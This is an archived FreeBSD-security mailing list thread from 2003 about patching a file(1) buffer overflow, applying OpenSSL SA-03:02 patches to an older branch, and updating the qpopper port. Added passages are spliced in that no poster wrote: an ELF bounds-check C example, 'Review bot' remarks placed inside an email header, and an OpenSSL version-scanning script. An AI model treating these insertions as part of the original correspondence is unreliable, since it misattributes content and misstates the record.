> fsmagic.o softmagic.o ascmagic.o compress.o is_tar.o readelf.o print-hacked.o
> Warning: Object directory not changed from original /usr/src/usr.bin/file
>
> bash-2.05b$ su
> Password:
>
> su-2.05b# make install
> install -s -o root -g wheel -m 555 file /usr/bin
> install -o root -g wheel -m 444 magic magic.mgc
> /usr/src/usr.bin/file/../../contrib/file/magic.mime magic.mime.mgc
> /usr/share/misc
> install -o root -g wheel -m 444 file.1.gz /usr/share/man/man1
> install -o root -g wheel -m 444 magic.5.gz /usr/share/man/man5
>
> su-2.05b# exit
> exit
>
> (TESTING again)
> bash-2.05b$ cd /tmp
>
> bash-2.05b$ file badfile
> badfile: ELF 32-bit LSB relocatable, AT&T WE32100 - invalid byte order,
> version 1 (SYSV)file: corrupted section header size.
> (=> file no longer seems vulnerable)
>
> bash-2.05b$ tail -1 /var/log/messages
> Mar 13 14:27:25 wwwback file: file command buffer overflow attempt against
> user 501/501 ?
> (if you used the syslog-able version)
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>
> Hope this will be helpful to some of you. Lemme know if anything needs
> further talk or whatever.

Guy,

The patch works for me on:

daggar>$ uname -a
FreeBSD daggar.mynet.local 4.8-RC FreeBSD 4.8-RC #0: Wed Mar 12 14:11:55 CST 2003 root@daggar.mynet.local:/usr/obj/usr/src/sys/DAGGAR i386

With system standard file installed:

daggar>$ file badfile
Segmentation fault (core dumped)
daggar>$

Now with patch applied and usr.bin/file rebuilt/installed

daggar>$ file badfile
badfile: ELF 32-bit LSB relocatable, AT&T WE32100 - invalid byte order, version 1 (SYSV)file: corrupted section header size.
daggar>$

Thanks for working on this.

Regards,

Stephen Hilton
nospam@hiltonbsd.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Mar 13 7:10:14 2003
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DF4C337B401 for ; Thu, 13 Mar 2003 07:10:11 -0800 (PST)
Received: from mx1.dev.itouchnet.net (itouchlabs.com [196.15.188.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id F379B43F75 for ; Thu, 13 Mar 2003 07:10:06 -0800 (PST) (envelope-from bvi@itouchlabs.com)
Received: from nobody by mx1.dev.itouchnet.net with scanned_ok (Exim 3.35 #1) id 18tUMb-0001CV-00 for freebsd-security@freebsd.org; Thu, 13 Mar 2003 17:11:21 +0200
Received: from itouchlabs.com ([196.15.188.2] helo=Beastie) by mx1.dev.itouchnet.net with esmtp (Exim 3.35 #1) id 18tUMa-0001CD-00; Thu, 13 Mar 2003 17:11:20 +0200
Message-ID: <002d01c2e972$98675e90$4508a8c0@Beastie>
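In the test transcripts above, the rebuilt file(1) rejects badfile with "corrupted section header size" instead of crashing. The C example below is added here (it is not Guy P.'s patch and not the file or FreeBSD source) and shows that kind of check, on the assumption that it compares the section-header entry size declared in the ELF header against the fixed structure size before anything is copied. All function names and the sample image are constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define EHDR32_SIZE 52u /* size of an ELF32 file header */
#define SHDR32_SIZE 40u /* size of one ELF32 section header */

enum elf_status {
    ELF_OK = 0,
    ELF_TRUNCATED = -1,     /* shorter than an ELF32 file header */
    ELF_UNSUPPORTED = -2,   /* not a little-endian ELF32 image */
    ELF_BAD_SHENTSIZE = -3, /* "corrupted section header size" */
    ELF_OUT_OF_BOUNDS = -4  /* index or table lies outside the image */
};

/* The section-header fields this example decodes. */
struct section32 { uint32_t name, type, offset, size; };

static uint16_t rd16(const unsigned char *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(unsigned char *p, uint16_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)(v >> 8);
}
static void wr32(unsigned char *p, uint32_t v)
{
    wr16(p, (uint16_t)(v & 0xffff));
    wr16(p + 2, (uint16_t)(v >> 16));
}

/* Decode section header `idx` from an in-memory ELF32 little-endian image. */
int elf32_section(const unsigned char *img, size_t len, unsigned idx,
                  struct section32 *out)
{
    unsigned char raw[SHDR32_SIZE]; /* fixed-size destination buffer */
    uint32_t shoff;
    uint16_t shentsize, shnum;

    if (len < EHDR32_SIZE)
        return ELF_TRUNCATED;
    if (memcmp(img, "\177ELF", 4) != 0 || img[4] != 1 || img[5] != 1)
        return ELF_UNSUPPORTED;

    shoff = rd32(img + 32);     /* e_shoff */
    shentsize = rd16(img + 46); /* e_shentsize */
    shnum = rd16(img + 48);     /* e_shnum */

    /* e_shentsize comes from the file: it must match the destination
     * size exactly before it is ever used as a copy length. */
    if (shentsize != sizeof raw)
        return ELF_BAD_SHENTSIZE;
    /* Overflow-free check that entry idx lies inside the image. */
    if (idx >= shnum || shoff > len || (len - shoff) / SHDR32_SIZE <= idx)
        return ELF_OUT_OF_BOUNDS;

    memcpy(raw, img + shoff + (size_t)idx * SHDR32_SIZE, shentsize);
    out->name = rd32(raw + 0);    /* sh_name */
    out->type = rd32(raw + 4);    /* sh_type */
    out->offset = rd32(raw + 16); /* sh_offset */
    out->size = rd32(raw + 20);   /* sh_size */
    return ELF_OK;
}

/* Build a constructed two-section ELF32 image (not a real binary). */
size_t make_sample(unsigned char *buf, size_t cap, uint16_t shentsize)
{
    size_t total = EHDR32_SIZE + 2 * SHDR32_SIZE;
    unsigned char *sh1;

    if (cap < total)
        return 0;
    memset(buf, 0, total);
    memcpy(buf, "\177ELF", 4);
    buf[4] = 1;                  /* ELFCLASS32 */
    buf[5] = 1;                  /* ELFDATA2LSB */
    buf[6] = 1;                  /* EV_CURRENT */
    wr16(buf + 16, 1);           /* e_type = ET_REL */
    wr32(buf + 32, EHDR32_SIZE); /* e_shoff: table follows the header */
    wr16(buf + 46, shentsize);   /* e_shentsize: the field under test */
    wr16(buf + 48, 2);           /* e_shnum */
    sh1 = buf + EHDR32_SIZE + SHDR32_SIZE;
    wr32(sh1 + 4, 1);            /* sh_type = SHT_PROGBITS */
    wr32(sh1 + 16, 0x100);       /* sh_offset */
    wr32(sh1 + 20, 0x20);        /* sh_size */
    return total;
}

int main(void)
{
    unsigned char img[EHDR32_SIZE + 2 * SHDR32_SIZE];
    struct section32 s;
    size_t n = make_sample(img, sizeof img, SHDR32_SIZE);

    printf("well-formed header:    %d\n", elf32_section(img, n, 1, &s));
    n = make_sample(img, sizeof img, 0x1000);
    printf("oversized e_shentsize: %d\n", elf32_section(img, n, 1, &s));
    return 0;
}
```
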
From: "Barry Irwin" To: , "security at FreeBSD" References: <20030313080852.A30434@sheol.localdomain> Subject: Re: SA-03:02.openssl for RELENG_4_6_2 vs. RELENG_4_5 Date: Thu, 13 Mar 2003 17:08:53 +0200 Organization: iTouch Labs MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 X-Checked: This message has been scanned for any virusses and unauthorized attachments. X-iScan-ID: 4613-1047568281-36285@unconfigured version $Name: REL_2_0_4 $ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Not directly answering your question, but an alternative is us build the openssl port with OVERWRITE_BASE defined. Barry ----- Original Message ----- 
From: "D J Hawkey Jr" To: "security at FreeBSD" Sent: Thursday, March 13, 2003 4:08 PM Subject: SA-03:02.openssl for RELENG_4_6_2 vs. RELENG_4_5 > Hello All. > > This is my last hope for "Are the SA-03:02.openssl patches for > RELENG_4_6_2 appropriate for RELENG_4_5?". > > After a dry-run, it appears that only the FreeBSD CVS version numbers > keep some half-dozen of the SA-03:02 patches from applying. > > FreeBSD released 4.4 with OpenSSL 0.9.6a. FreeBSD released 4.5 with the > same (though it may have had changes?). FreeBSD released 4.6.2 with > OpenSSL 0.9.e. > > OK. So as I go about cvsup'ing along the RELENG_4_5 tree, at p13, the > source is upgraded to OpenSSL 0.9.6e. At p18, it got an ASN.1 patch. So > did RELENG_4_6, at p10. Both RELENGs continued to get the same patches > until RELENG_4_5 support was dropped. So, up through RELENG_4_6_2 p7 > (p8 is SA-03:02), the two RELENGs had the same OpenSSL trees, right? > > Therefore: Does anyone know that the SA-03:02 patches for RELENG_4_6_2 > should not be applied to a RELENG_4_5 tree (after getting by the above > versioning SNAFU)? > > Thanks, > Dave > > -- > ______________________ ______________________ > \__________________ \ D. J. HAWKEY JR. 
/ __________________/ > \________________/\ hawkeyd@visi.com /\________________/ > http://www.visi.com/~hawkeyd/ > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 13 7:10:48 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D773C37B404 for ; Thu, 13 Mar 2003 07:10:44 -0800 (PST) Received: from lava.sentex.ca (pyroxene.sentex.ca [199.212.134.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5938843F3F for ; Thu, 13 Mar 2003 07:10:43 -0800 (PST) (envelope-from mike@sentex.net) Received: from simian.sentex.net (simeon.sentex.ca [192.168.43.27]) by lava.sentex.ca (8.12.8/8.12.8) with ESMTP id h2DFAg8w089512 for ; Thu, 13 Mar 2003 10:10:42 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.2.0.9.0.20030313100451.044b5dd8@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Thu, 13 Mar 2003 10:15:37 -0500 To: security@FreeBSD.ORG 
From: Mike Tancsa Subject: Patch to qpopper port files In-Reply-To: References: <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> <4.3.2.7.2.20030312123805.03d83a20@localhost> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (lava/20020517) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The diffs below to the Makefile and distinfo seem to do the trick for anyone wanting to grab an updated version before the port gets committed. This works for me, YMMV. ---Mike --- Makefile.prev +++ Makefile @@ -6,7 +6,7 @@ # PORTNAME= qpopper -PORTVERSION= 4.0.4 +PORTVERSION= 4.0.5 PORTREVISION= 1 CATEGORIES= mail ipv6 MASTER_SITES= ftp://ftp.qualcomm.com/eudora/servers/unix/popper/%SUBDIR%/ 
@@ -17,7 +17,7 @@ .if ${OSVERSION} >= 400014 && !defined(WITHOUT_IPV6) PATCH_SITES= http://www.imasy.or.jp/~ume/ipv6/ -PATCHFILES= qpopper4.0.4-ipv6-20020502.diff.gz +PATCHFILES= qpopper4.0.5-ipv6-20030313.diff.gz PATCH_DIST_STRIP= -p1 .endif At 02:54 PM 13/03/2003 +0900, Hajimu UMEMOTO wrote: >Hi, > > >>>>> On Wed, 12 Mar 2003 14:55:43 -0500 > >>>>> Mike Tancsa said: > >mike> I dont see the offical release yet, but I imagine the guy is on the >west >mike> coast, so its not quite afternoon there. > >I don't see offcial announce yet, it seems 4.0.5 was out. > >mike> The only patch that does not apply cleanly in the port is the ipv6 >patch. > >I've just updated my IPv6 patch for 4.0.5: > > http://www.imasy.or.jp/~ume/ipv6/qpopper4.0.5-ipv6-20030313.diff.gz > >Sincerely, > >-- >Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan >ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org >http://www.imasy.org/~ume/ > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 13 9:16:52 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8626A37B404 for ; Thu, 13 Mar 2003 09:16:49 -0800 (PST) Received: from rwcrmhc51.attbi.com (rwcrmhc51.attbi.com [204.127.198.38]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5C0A843FBD for ; Thu, 13 Mar 2003 09:16:48 -0800 (PST) (envelope-from bmah@employees.org) Received: from bmah.dyndns.org (12-240-204-110.client.attbi.com[12.240.204.110]) by rwcrmhc51.attbi.com (rwcrmhc51) with ESMTP id <2003031317164705100djh1le>; Thu, 13 Mar 2003 17:16:47 +0000 Received: from intruder.bmah.org (localhost [127.0.0.1]) by bmah.dyndns.org (8.12.8/8.12.8) with ESMTP id h2DHGlWp019504; Thu, 13 Mar 2003 09:16:47 -0800 (PST) 
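Review bot: In the first Makefile hunk (@@ -6,7 +6,7 @@), PORTREVISION= 1 is left as an unchanged context line directly under the bumped PORTVERSION= 4.0.5. A PORTVERSION bump normally resets PORTREVISION, so that line should be dropped in this hunk; otherwise the first 4.0.5 package is built as 4.0.5_1.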
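Review bot: The second Makefile hunk (@@ -17,7 +17,7 @@) switches PATCHFILES to qpopper4.0.5-ipv6-20030313.diff.gz, but no distinfo hunk is visible although the message says distinfo was changed too. distinfo needs checksum entries for both the 4.0.5 distfile and this new IPv6 diff; PATCH_SITES is a plain http:// URL, so the recorded checksum is the only integrity check on the fetched patch.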
(envelope-from bmah@intruder.bmah.org) Received: (from bmah@localhost) by intruder.bmah.org (8.12.8/8.12.8/Submit) id h2DHGlYa019503; Thu, 13 Mar 2003 09:16:47 -0800 (PST) Date: Thu, 13 Mar 2003 09:16:47 -0800 
From: "Bruce A. Mah" To: D J Hawkey Jr Cc: security at FreeBSD Subject: Re: SA-03:02.openssl for RELENG_4_6_2 vs. RELENG_4_5 Message-ID: <20030313171647.GA19381@intruder.bmah.org> References: <20030313080852.A30434@sheol.localdomain> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="fUYQa+Pmc3FrFX/N" Content-Disposition: inline In-Reply-To: <20030313080852.A30434@sheol.localdomain> User-Agent: Mutt/1.4i X-Image-Url: http://www.employees.org/~bmah/Images/bmah-cisco-small.gif X-url: http://www.employees.org/~bmah/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --fUYQa+Pmc3FrFX/N Content-Type: text/plain; charset=us-ascii Content-Disposition: inline If memory serves me right, D J Hawkey Jr wrote: > OK. So as I go about cvsup'ing along the RELENG_4_5 tree, at p13, the > source is upgraded to OpenSSL 0.9.6e. At p18, it got an ASN.1 patch. So > did RELENG_4_6, at p10. Both RELENGs continued to get the same patches > until RELENG_4_5 support was dropped. So, up through RELENG_4_6_2 p7 > (p8 is SA-03:02), the two RELENGs had the same OpenSSL trees, right? Probably. In theory, just because the version numbers are the same doesn't mean that there weren't minor tweaks. I think this is pretty unlikely, however. [1] Any reason you can't just check out copies of src/contrib/openssl for the RELENG_4_5 and RELENG_4_6 branches and diff them? If the only deltas are version numbers, you're probably safe. Bruce. [1] This statement is based only on my own recollections of OpenSSL imports and upgrades around this time. You could look to see if I documented any changes in the release notes or errata, but I don't remember doing anything like this. 
--fUYQa+Pmc3FrFX/N Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (FreeBSD) iD8DBQE+cLz+2MoxcVugUsMRAjGQAKD39yn7UPzwwAXHbCkPNcqRP8UHJACdEy6b f1R2gjMQhVJFTg2vDXSO/JU= =UE8Q -----END PGP SIGNATURE----- --fUYQa+Pmc3FrFX/N-- From owner-freebsd-security Thu Mar 13 9:54: 6 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 17C1837B401; Thu, 13 Mar 2003 09:54:03 -0800 (PST) Received: from bodb.mc.mpls.visi.com (bodb.mc.mpls.visi.com [208.42.156.104]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4204543F75; Thu, 13 Mar 2003 09:54:02 -0800 (PST) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bodb.mc.mpls.visi.com (Postfix) with ESMTP id 97BB94BEB; Thu, 13 Mar 2003 11:54:01 -0600 (CST) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id h2DHs0X68608; Thu, 13 Mar 2003 11:54:00 -0600 (CST) (envelope-from hawkeyd) Date: Thu, 13 Mar 2003 11:54:00 -0600 
From: D J Hawkey Jr To: "Bruce A. Mah" Cc: security at FreeBSD Subject: Re: SA-03:02.openssl for RELENG_4_6_2 vs. RELENG_4_5 Message-ID: <20030313115400.A25510@sheol.localdomain> Reply-To: hawkeyd@visi.com References: <20030313080852.A30434@sheol.localdomain> <20030313171647.GA19381@intruder.bmah.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20030313171647.GA19381@intruder.bmah.org>; from bmah@FreeBSD.ORG on Thu, Mar 13, 2003 at 09:16:47AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mar 13, at 09:16 AM, Bruce A. Mah wrote: > > > OK. So as I go about cvsup'ing along the RELENG_4_5 tree, at p13, the > > source is upgraded to OpenSSL 0.9.6e. At p18, it got an ASN.1 patch. So > > did RELENG_4_6, at p10. Both RELENGs continued to get the same patches > > until RELENG_4_5 support was dropped. So, up through RELENG_4_6_2 p7 > > (p8 is SA-03:02), the two RELENGs had the same OpenSSL trees, right? > > Probably. In theory, just because the version numbers are the same > doesn't mean that there weren't minor tweaks. I think this is pretty > unlikely, however. [1] I can accept that tweaks made in the RELENG_4_5 tree might get lost in patching upwards to 0.9.6i with SA-03:02; at least I'll know I can probably continue patching the OpenSSL tree against RELENG_4_6 updates. > Any reason you can't just check out copies of src/contrib/openssl for > the RELENG_4_5 and RELENG_4_6 branches and diff them? If the only > deltas are version numbers, you're probably safe. Um, sheer number of files vs. Time, mostly. For those six files that had rejected patches, I changed the versions in the patchfile to those of the sources, and the entire update occurred without incident. BZZT! "Oh, I'm sorry, discussion time is over." 
Throwing caution to the wind, I started a buildworld against the updated source about 45 minutes ago. Anyone know how to run the tests in /usr/src/crypto/openssl/apps and/or /usr/src/crypto/openssl/test, and what to look for? :-) Oh! I also need to know how one ascertains what binaries are statically linked to libcrypto and/or libssl? > Bruce. Thanks, Dave -- ______________________ ______________________ \__________________ \ D. J. HAWKEY JR. / __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ From owner-freebsd-security Thu Mar 13 12:19:53 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A9B6637B401; Thu, 13 Mar 2003 12:19:50 -0800 (PST) Received: from bran.mc.mpls.visi.com (bran.mc.mpls.visi.com [208.42.156.103]) by mx1.FreeBSD.org (Postfix) with ESMTP id 107CE43FA3; Thu, 13 Mar 2003 12:19:49 -0800 (PST) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bran.mc.mpls.visi.com (Postfix) with ESMTP id 4BD874D1D; Thu, 13 Mar 2003 14:19:48 -0600 (CST) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id h2DKJl000660; Thu, 13 Mar 2003 14:19:47 -0600 (CST) (envelope-from hawkeyd) Date: Thu, 13 Mar 2003 14:19:47 -0600 
From: D J Hawkey Jr To: "Bruce A. Mah" Cc: security at FreeBSD Subject: Re: SA-03:02.openssl for RELENG_4_6_2 vs. RELENG_4_5 Message-ID: <20030313141947.A600@sheol.localdomain> Reply-To: hawkeyd@visi.com References: <20030313080852.A30434@sheol.localdomain> <20030313171647.GA19381@intruder.bmah.org> <20030313115400.A25510@sheol.localdomain> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20030313115400.A25510@sheol.localdomain>; from hawkeyd@visi.com on Thu, Mar 13, 2003 at 11:54:00AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mar 13, at 11:54 AM, D J Hawkey Jr wrote: > > BZZT! "Oh, I'm sorry, discussion time is over." > > Throwing caution to the wind, I started a buildworld against the updated > source about 45 minutes ago. The build went without a hitch:

  $ uname -v
  FreeBSD 4.5-RELEASE-p24.4 #0: Thu Mar 13 12:30:11 CST 2003 root@sheol.localdomain:/usr/obj/usr/src/sys/SHEOL
  $ openssl
  OpenSSL> version
  OpenSSL 0.9.6i Feb 19 2003
  OpenSSL>q

SSH'ing to a Sun box and back works, as does SSL'd fetchmail. So:
- Anyone know how to run the tests in /usr/src/crypto/openssl/apps and/or /usr/src/crypto/openssl/test? What does one look for?
- How does one ascertain what binaries are statically linked to libcrypto and/or libssl? libcrypt, too? Exactly what libraries am I interested in?
Dave -- ______________________ ______________________ \__________________ \ D. J. HAWKEY JR. 
/ __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ From owner-freebsd-security Fri Mar 14 10:12:41 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1087A37B401 for ; Fri, 14 Mar 2003 10:12:38 -0800 (PST) Received: from bodb.mc.mpls.visi.com (bodb.mc.mpls.visi.com [208.42.156.104]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5FAB443F75 for ; Fri, 14 Mar 2003 10:12:37 -0800 (PST) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bodb.mc.mpls.visi.com (Postfix) with ESMTP id C85E44CE8 for ; Fri, 14 Mar 2003 12:12:36 -0600 (CST) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id h2EICav08369 for freebsd-security@freebsd.org; Fri, 14 Mar 2003 12:12:36 -0600 (CST) (envelope-from hawkeyd) Date: Fri, 14 Mar 2003 12:12:35 -0600 
From: D J Hawkey Jr To: security at FreeBSD Subject: Re: SA-03:02.openssl for RELENG_4_6_2 vs. RELENG_4_5 Message-ID: <20030314121235.A8200@sheol.localdomain> Reply-To: hawkeyd@visi.com References: <20030313080852.A30434@sheol.localdomain> <20030313171647.GA19381@intruder.bmah.org> <20030313115400.A25510@sheol.localdomain> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20030313115400.A25510@sheol.localdomain>; from hawkeyd@visi.com on Thu, Mar 13, 2003 at 11:54:00AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mar 13, at 11:54 AM, D J Hawkey Jr wrote: > > Oh! I also need to know how one ascertains what binaries are statically > linked to libcrypto and/or libssl? Got it. Try this:

  find $DIR -type f \
    |xargs readelf -a 2>/dev/null \
    |awk '/^File:/ { name = $2; printed = 0; } \
          /SSL|TLS/ { if (!printed) { print name; printed = 1; } }' \
    |xargs ldd 2>/dev/null

This might be too liberal, but better safe than sorry. If it returns just filenames, they're statically-linked. On my workstation, only Mozilla has components (12 libraries) that are statically-linked to SSL/TLS code, but I don't know if they use the system SSL/TLS libraries, or if they're completely self-contained. > Anyone know how to run the tests in /usr/src/crypto/openssl/apps and/or > /usr/src/crypto/openssl/test, and what to look for? :-) This I still need help with. Thanks, Dave -- ______________________ ______________________ \__________________ \ D. J. HAWKEY JR. 
/ __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ From owner-freebsd-security Fri Mar 14 11:11:33 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1356637B401 for ; Fri, 14 Mar 2003 11:11:31 -0800 (PST) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id B1B0B43FD7 for ; Fri, 14 Mar 2003 11:11:29 -0800 (PST) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA24977; Fri, 14 Mar 2003 12:11:18 -0700 (MST) X-message-flag: Warning! Use of Microsoft Outlook renders your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20030314121038.02c9d630@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Fri, 14 Mar 2003 12:11:16 -0700 To: Mike Tancsa , security@FreeBSD.ORG 
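Added example, not part of the thread and not code from any poster: a different technique from the readelf/ldd pipeline in the SA-03:02.openssl message above, for the same question of which files carry their own copy of OpenSSL. It searches file contents for the OpenSSL version banner (the string `openssl version` prints in that thread) and compares it with the fixed version 0.9.6i. Assumptions: objects linked from libcrypto/libssl embed that banner, the function names are hypothetical, the sample files are constructed stand-ins rather than real binaries, and only OpenSSL is detected, not other SSL/TLS implementations.

```shell
#!/bin/sh
# Inventory files that embed OpenSSL code, keyed on the version banner.
# Assumption: objects linked from libcrypto/libssl carry strings such as
# "OpenSSL 0.9.6i Feb 19 2003" or "RSA part of OpenSSL 0.9.6e ...".

# banner_versions FILE -> distinct OpenSSL versions found in FILE, one per line
banner_versions() {
    [ -r "$1" ] || return 0
    # Turn every non-printable byte into a newline (a portable stand-in for
    # strings(1)), then keep only the version token that follows "OpenSSL ".
    LC_ALL=C tr -c '[:print:]' '\n' < "$1" |
        sed -n 's/.*OpenSSL \([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*[a-z]*\).*/\1/p' |
        sort -u
}

# scan_tree DIR FIXED -> one tab-separated line per hit: state, kind, version, path
#   state: "current" if the version equals FIXED, otherwise "STALE"
#   kind:  "library" for libcrypto/libssl themselves, otherwise "embedded"
scan_tree() {
    # File names containing newlines are not handled.
    find "$1" -type f | while IFS= read -r f; do
        case ${f##*/} in
            libcrypto.*|libssl.*) kind=library ;;
            *)                    kind=embedded ;;
        esac
        for v in $(banner_versions "$f"); do
            if [ "$v" = "$2" ]; then state=current; else state=STALE; fi
            printf '%s\t%s\t%s\t%s\n' "$state" "$kind" "$v" "$f"
        done
    done
}

# make_samples DIR -> constructed stand-ins for binaries (not real ELF files)
make_samples() {
    mkdir -p "$1/bin" "$1/lib"
    printf '\177ELF\001\002junk\001RSA part of OpenSSL 0.9.6e 30 Jul 2002\001tail\n' \
        > "$1/bin/oldtool"
    printf '\177ELF\001\002OpenSSL 0.9.6i Feb 19 2003\001\n' > "$1/lib/libcrypto.so.2"
    printf '\177ELF\001\002no crypto in here\001\n' > "$1/bin/plain"
}

# Demo run over the constructed samples.
demo=$(mktemp -d)
make_samples "$demo"
scan_tree "$demo" 0.9.6i
rm -rf "$demo"
```

A STALE line of kind "embedded" marks a file that a rebuild of the base system's libcrypto and libssl does not fix; it has to be rebuilt or replaced itself.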
From: Brett Glass Subject: Re: Patch to qpopper port files In-Reply-To: <5.2.0.9.0.20030313100451.044b5dd8@marble.sentex.ca> References: <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> <4.3.2.7.2.20030312123805.03d83a20@localhost> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 08:15 AM 3/13/2003, Mike Tancsa wrote: >The diffs below to the Makefile and distinfo seem to do the trick for anyone wanting to grab an updated version before the port gets committed. This works for me, YMMV. This doesn't seem to work on 4.7. --Brett From owner-freebsd-security Fri Mar 14 11:46: 7 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0216E37B401 for ; Fri, 14 Mar 2003 11:46:05 -0800 (PST) Received: from lava.sentex.ca (pyroxene.sentex.ca [199.212.134.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id DEB5843F3F for ; Fri, 14 Mar 2003 11:46:03 -0800 (PST) 